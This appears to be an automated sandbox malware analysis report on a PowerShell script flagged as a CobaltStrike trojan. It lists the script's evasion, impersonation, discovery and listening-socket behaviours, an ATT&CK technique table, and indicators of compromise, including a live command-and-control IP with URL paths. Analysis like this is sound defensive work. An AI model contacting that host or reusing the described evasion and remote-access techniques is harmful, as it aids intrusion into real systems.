                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED33FA1C0_2_000001A6ED33FA1C
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED3458540_2_000001A6ED345854
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5027Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4799Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAPI coverage: 2.0 %
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED3458540_2_000001A6ED345854
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1056Thread sleep time: -14757395258967632s >= -30000sJump to behavior
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED349220 malloc,_snprintf,FindFirstFileA,free,malloc,_snprintf,free,FindNextFileA,FindClose,0_2_000001A6ED349220
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED341C30 malloc,GetCurrentDirectoryA,FindFirstFileA,GetLastError,free,free,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose,0_2_000001A6ED341C30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                    Source: powershell.exe, 00000000.00000002.4602030423.000001A6ECEFD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.4602674229.000001A6ECF9B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: powershell.exe, 00000000.00000002.4602674229.000001A6ECF9B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW>
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED3521DC __crtCaptureCurrentContext,IsDebuggerPresent,0_2_000001A6ED3521DC
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED359744 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_000001A6ED359744
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED360198 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,FreeLibrary,LoadLibraryExW,GetLastError,LoadLibraryExW,0_2_000001A6ED360198
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED3621C0 GetProcessHeap,DeleteProcThreadAttributeList,0_2_000001A6ED3621C0
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED3624C8 DeleteCriticalSection,SetUnhandledExceptionFilter,0_2_000001A6ED3624C8
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED3624D0 RtlCaptureContext,SetUnhandledExceptionFilter,0_2_000001A6ED3624D0

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2820, type: MEMORYSTR
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED34DF50 LogonUserA,GetLastError,ImpersonateLoggedOnUser,GetLastError,0_2_000001A6ED34DF50
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED34DEC8 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_000001A6ED34DEC8
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED340920 CreateNamedPipeA,0_2_000001A6ED340920
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED3622A0 ReadFile,GetLocalTime,0_2_000001A6ED3622A0
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED34B47C malloc,GetComputerNameExA,GetComputerNameA,GetUserNameA,malloc,0_2_000001A6ED34B47C
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED3621A8 GetVersionExA,0_2_000001A6ED3621A8

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2820, type: MEMORYSTR
                    Source: Yara matchFile source: 0.2.powershell.exe.1a6ed2e0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.powershell.exe.1a6ed2e0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.4595950980.000001A6E4C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0.2.powershell.exe.1a6ed330000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.powershell.exe.1a6ed330000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: oEFrY6Xcyl.ps1, type: SAMPLE
                    Source: Yara matchFile source: amsi64_2820.amsi.csv, type: OTHER
                    Source: Yara matchFile source: 00000000.00000002.4602998708.000001A6ED0B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.4595950980.000001A6E4B7C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.4580368839.000001A6D5739000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2820, type: MEMORYSTR
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED346A78 socket,htons,ioctlsocket,closesocket,bind,listen,0_2_000001A6ED346A78
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED34EE8C socket,closesocket,htons,bind,listen,0_2_000001A6ED34EE8C
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED346670 htonl,htons,socket,closesocket,bind,ioctlsocket,0_2_000001A6ED346670
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire Infrastructure2
                    Valid Accounts
                    1
                    Native API
                    2
                    Valid Accounts
                    2
                    Valid Accounts
                    1
                    Masquerading
                    OS Credential Dumping1
                    System Time Discovery
                    Remote Services1
                    Archive Collected Data
                    22
                    Encrypted Channel
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/Job1
                    DLL Side-Loading
                    21
                    Access Token Manipulation
                    2
                    Valid Accounts
                    LSASS Memory141
                    Security Software Discovery
                    Remote Desktop ProtocolData from Removable Media1
                    Ingress Tool Transfer
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)2
                    Process Injection
                    21
                    Virtualization/Sandbox Evasion
                    Security Account Manager21
                    Virtualization/Sandbox Evasion
                    SMB/Windows Admin SharesData from Network Shared Drive11
                    Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                    DLL Side-Loading
                    21
                    Access Token Manipulation
                    NTDS2
                    Process Discovery
                    Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                    Process Injection
                    LSA Secrets1
                    Application Window Discovery
                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Obfuscated Files or Information
                    Cached Domain Credentials1
                    Account Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Software Packing
                    DCSync1
                    System Owner/User Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    DLL Side-Loading
                    Proc Filesystem3
                    File and Directory Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow13
                    System Information Discovery
                    Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    oEFrY6Xcyl.ps166%ReversingLabsScript-PowerShell.Trojan.CobaltStrike
                    oEFrY6Xcyl.ps1100%AviraTR/Coblat.G1
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://nuget.org/NuGet.exe0%URL Reputationsafe
                    http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                    https://go.micro0%URL Reputationsafe
                    https://contoso.com/License0%URL Reputationsafe
                    https://contoso.com/Icon0%URL Reputationsafe
                    https://contoso.com/0%URL Reputationsafe
                    https://nuget.org/nuget.exe0%URL Reputationsafe
                    https://aka.ms/pscore680%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    No contacted domains info
                    NameMaliciousAntivirus DetectionReputation
                    20.25.126.96true
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.4595950980.000001A6E4C51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.4580368839.000001A6D5739000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.4580368839.000001A6D4D39000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.4580368839.000001A6D4D39000.00000004.00000800.00020000.00000000.sdmpfalse
                        unknown
                        https://20.25.126.96/powershell.exe, 00000000.00000002.4602674229.000001A6ECFBB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.4602030423.000001A6ECEFD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.4601032571.000001A6ECC91000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.4602030423.000001A6ECEB0000.00000004.00000020.00020000.00000000.sdmpfalse
                          unknown
                          https://go.micropowershell.exe, 00000000.00000002.4580368839.000001A6D5739000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://20.25.126.96/cmWpowershell.exe, 00000000.00000002.4601032571.000001A6ECCFB000.00000004.00000020.00020000.00000000.sdmpfalse
                            unknown
                            https://contoso.com/Licensepowershell.exe, 00000000.00000002.4580368839.000001A6D5739000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://contoso.com/Iconpowershell.exe, 00000000.00000002.4580368839.000001A6D5739000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://20.25.126.96/jpowershell.exe, 00000000.00000002.4602674229.000001A6ECFBB000.00000004.00000020.00020000.00000000.sdmpfalse
                              unknown
                              https://20.25.126.96/cm=powershell.exe, 00000000.00000002.4601032571.000001A6ECCFB000.00000004.00000020.00020000.00000000.sdmpfalse
                                unknown
                                https://20.25.126.96/mpowershell.exe, 00000000.00000002.4602674229.000001A6ECFBB000.00000004.00000020.00020000.00000000.sdmpfalse
                                  unknown
                                  https://20.25.126.96/cm;powershell.exe, 00000000.00000002.4601032571.000001A6ECCFB000.00000004.00000020.00020000.00000000.sdmpfalse
                                    unknown
                                    https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.4580368839.000001A6D4D39000.00000004.00000800.00020000.00000000.sdmpfalse
                                      unknown
                                      https://20.25.126.96/ngspowershell.exe, 00000000.00000002.4602674229.000001A6ECFBB000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        https://20.25.126.96/cm5.126.96/cmpowershell.exe, 00000000.00000002.4602674229.000001A6ECFBB000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          https://20.25.126.96/cmvpowershell.exe, 00000000.00000002.4602674229.000001A6ECFBB000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            https://20.25.126.96/ms2powershell.exe, 00000000.00000002.4602674229.000001A6ECFBB000.00000004.00000020.00020000.00000000.sdmpfalse
                                              unknown
                                              https://20.25.126.96/cmwpowershell.exe, 00000000.00000002.4602674229.000001A6ECFBB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.4602030423.000001A6ECEFD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                https://20.25.126.96/cmqpowershell.exe, 00000000.00000002.4602674229.000001A6ECFBB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  unknown
                                                  https://contoso.com/powershell.exe, 00000000.00000002.4580368839.000001A6D5739000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.4595950980.000001A6E4C51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://20.25.126.96/cmspowershell.exe, 00000000.00000002.4602674229.000001A6ECFBB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    unknown
                                                    https://aka.ms/pscore68powershell.exe, 00000000.00000002.4580368839.000001A6D4B11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://20.25.126.96/mspowershell.exe, 00000000.00000002.4602674229.000001A6ECFBB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      unknown
                                                      https://20.25.126.96/cmfpowershell.exe, 00000000.00000002.4602030423.000001A6ECEB0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        http://127.0.0.1:%u/powershell.exe, 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpfalse
                                                          unknown
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.4580368839.000001A6D4B11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://20.25.126.96/cmpowershell.exe, 00000000.00000002.4602030423.000001A6ECEFD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.4601032571.000001A6ECC91000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.4602030423.000001A6ECEB0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            unknown
                                                            https://20.25.126.96/?powershell.exe, 00000000.00000002.4602030423.000001A6ECEFD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              unknown
                                                              https://20.25.126.96/cmdpowershell.exe, 00000000.00000002.4602030423.000001A6ECEB0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                unknown
                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs
                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                20.25.126.96
                                                                unknownUnited States
                                                                8075MICROSOFT-CORP-MSN-AS-BLOCKUStrue
                                                                Joe Sandbox version:41.0.0 Charoite
                                                                Analysis ID:1542798
                                                                Start date and time:2024-10-26 13:42:37 +02:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 6m 42s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Number of analysed new started processes analysed:6
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:oEFrY6Xcyl.ps1
                                                                renamed because original name is a hash value
                                                                Original Sample Name:225e88d982bb204ca48d3e7e2999e0b651dbf8d51d23840e142e6df7426548b2.ps1
                                                                Detection:MAL
                                                                Classification:mal100.troj.evad.winPS1@2/5@0/1
                                                                EGA Information:
                                                                • Successful, ratio: 100%
                                                                HCA Information:
                                                                • Successful, ratio: 92%
                                                                • Number of executed functions: 10
                                                                • Number of non-executed functions: 182
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .ps1
                                                                • Override analysis time to 240s for powershell
                                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • VT rate limit hit for: oEFrY6Xcyl.ps1
                                                                TimeTypeDescription
                                                                07:43:31API Interceptor130x Sleep call for process: powershell.exe modified
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                20.25.126.96m8K9cEQFa1.dllGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                  foEIrd5DlF.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                    5Cw7877KPD.dllGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                      6GUgc6JYS1.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                        J4o8OaYTEF.dllGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                          rSJj3YS2J1.exeGet hashmaliciousCobaltStrikeBrowse
                                                                            HvREKnuoh7.exeGet hashmaliciousCobaltStrikeBrowse
                                                                              foEIrd5DlF.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                                VBqmdl6ttr.exeGet hashmaliciousCobaltStrikeBrowse
                                                                                  IhmhW5dP4s.exeGet hashmaliciousCobaltStrikeBrowse
                                                                                    No context
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    MICROSOFT-CORP-MSN-AS-BLOCKUSm8K9cEQFa1.dllGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                                    • 20.25.126.96
                                                                                    foEIrd5DlF.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                                    • 20.25.126.96
                                                                                    5Cw7877KPD.dllGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                                    • 20.25.126.96
                                                                                    6GUgc6JYS1.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
